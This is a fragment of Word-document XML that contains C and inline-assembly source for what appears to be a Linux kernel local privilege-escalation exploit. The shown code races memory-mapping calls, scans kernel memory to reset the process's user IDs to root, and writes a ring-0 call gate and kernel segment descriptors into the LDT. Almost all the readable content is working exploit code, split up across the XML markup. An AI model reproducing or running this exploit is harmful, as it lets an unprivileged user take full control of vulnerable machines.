    </w:p>
    <w:p w14:paraId="28BE9C4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val = sys_madvise((void*) lib_addr, PAGE_SIZE, MADV_NORMAL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D74F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val) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD955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errno = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115690A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ab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>val = sys_madvise((void*) (lib_addr+PAGE_SIZE),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F942E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LIB_SIZE-PAGE_SIZE, MADV_NORMAL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3588234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val || (val&lt;0 &amp;&amp; errno!=ENOMEM) ) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BF588E" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B504A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MP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5881001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mp--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED68B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smp&gt;=0) goto recheck2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D81A91" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127FE27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recheck race</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2025D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go) continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F58291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finish++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DCAA7" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC413F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we need to free one vm_area_struct for mmap to work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F373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val = sys_mprotect(map_addr, PAGE_SIZE, map_flags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5035E0D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val) fatal("mprotect", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF8A3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val = sys_mmap2(lib_addr + PAGE_SIZE, PAGE_SIZE*3, PROT_NONE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6678B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 xml:space="preserve">      MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6930B27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1==val) fatal("mmap2 race", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B070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n[+] race won maps=%d", map_count); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8946D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kill(consume_pid, SIGKILL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606ED7B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_exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756FAE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7EE50F57" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348A741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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9571F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064142F5" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B27604" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2966361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callme_1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51360AD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214B997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eturn val++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4AB07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086076FD" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C16C66" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5268708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int valid_ptr(unsigned ptr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0CA7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85453F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eturn ptr&gt;=task_size &amp;&amp; ptr&lt;addr_min-16;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76269DB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27D9E5E" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68316605" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A23C0E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int validate_vma(unsigned *p, unsigned s, unsigned e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AC5E1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67A39CE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unsigned *t;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC85638" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A04A3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valid_ptr(p[0]) &amp;&amp; valid_ptr(p[3]) &amp;&amp; p[1]==s &amp;&amp; p[2]==e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B9F0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t=(unsigned*)p[3];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621FDBB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t[0]==p[0] &amp;&amp; t[1]&lt;=task_size &amp;&amp; t[2]&lt;=task_size )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3C694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return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579F76F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1BA31DE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eturn 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBFB1D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6415528D" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210CCAD5" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02CE1E8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smlinkage void kernel_code(unsigned *task)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3875F00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F85B48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unsigned *addr = task;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B7F2D" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FABCE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find &amp; reset uids</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2E0F2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hile(addr[0] != uid || addr[1] != uid ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2107790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 xml:space="preserve">      addr[2] != uid || addr[3] != uid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB983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addr++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CACA5F" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC2834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addr[0] = addr[1] = addr[2] = addr[3] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4433937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addr[4] = addr[5] = addr[6] = addr[7] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ADE194" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB3A2F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find &amp; correct VMA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F9A0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or(addr=(unsigned *)task_size; (unsigned)addr&lt;addr_min-16; addr++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4645A0B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validate_vma(addr, vma_start, vma_end) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78345F8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addr[1] = task_size - PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41BB5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addr[2] = task_size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC2D9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5E2E4D9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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3163F2E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626B29B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42D27FA" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13638661" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C26E19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kcode(void);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA88FEF" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA67AE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CPL0 code mostly stolen from cliph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C5907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__kcode(void)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4642EC1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067C1D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sm(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7784114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kcode:</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20977EC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pusha</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6EE8462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pushl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%es</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5FD9260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pushl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%ds</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2894DA2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movl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>$(" xstr(SEL_LDS) ") ,%edx</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7181A41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movl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%edx,%es</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158100B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movl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%edx,%ds</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110537C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movl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>$0xffffe000,%eax</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1039E28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andl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%esp,%eax</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17B50E7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pushl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%eax</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17F8E3D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call</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>kernel_code</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424A800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addl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>$4, %esp</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3F1F931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popl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%ds</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3959E84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popl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%es</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4931350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popa</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7FCD093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r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>lret</w:t>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E7667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 xml:space="preserve">    );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0353854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362CD3BA" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C365BB" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13229BA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callme_2()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B99AD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3876607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eturn val + task_size + addr_min;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30602CD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4A626D9" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252D49BF" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5572E20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sigfailed(int v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3356F95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2AA9738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cnt++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C1B67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ab/>
        <w:t>fatal("lcall", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F82DF4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ABDA3E1" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7844C1D5" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00CCF31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modify LDT &amp; exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519612E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try_to_exploit(unsigned addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0560943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6523EFC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latile int r, *v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB29CA8" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15309A1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 try to exploit 0x%.8x", addr); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0493717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unlink(libname);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2775B728" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A003ED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sys_mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE|map_flags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677989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r) fatal("mprotect 1", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5526CF6C" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF03CE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check if really LDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D152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 = (void*) (addr + (ENTRY_GATE*LDT_ENTRY_SIZE % PAGE_SIZE) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09014B9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gnal(SIGSEGV, sigfailed);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BDB23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v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A404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r != MAGIC) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830669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n[-] FAILED val = 0x%.8x", r); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DB97C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fatal("find LDT", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5B661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3F697426" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B99BB2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yeah, setup CPL0 gate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AECAB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0] = ((unsigned)(SEL_LCS)&lt;&lt;16) | ((unsigned)kcode &amp; 0xffffU);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A2F99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1] = ((unsigned)kcode &amp; ~0xffffU) | 0xec00U;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4DD10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 gate modified ( 0x%.8x 0x%.8x )", v[0], v[1]); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A59A63A" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4AFC5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etup CPL0 segment descriptors (we need the 'accessed' versions ;-)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BFD72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 = (void*) (addr + (ENTRY_LCS*LDT_ENTRY_SIZE % PAGE_SIZE) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AD871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0] = 0x0000ffff; /* kernel 4GB code at 0x00000000 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5924B00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1] = 0x00cf9b00;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F831174" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12417F7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 = (void*) (addr + (ENTRY_LDS*LDT_ENTRY_SIZE % PAGE_SIZE) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C3902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0] = 0x0000ffff; /* kernel 4GB data at 0x00000000 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7D400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1] = 0x00cf9300;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DC739" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45A0B38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reprotect to get only one big VMA</w:t>
      </w:r>
    </w:p>
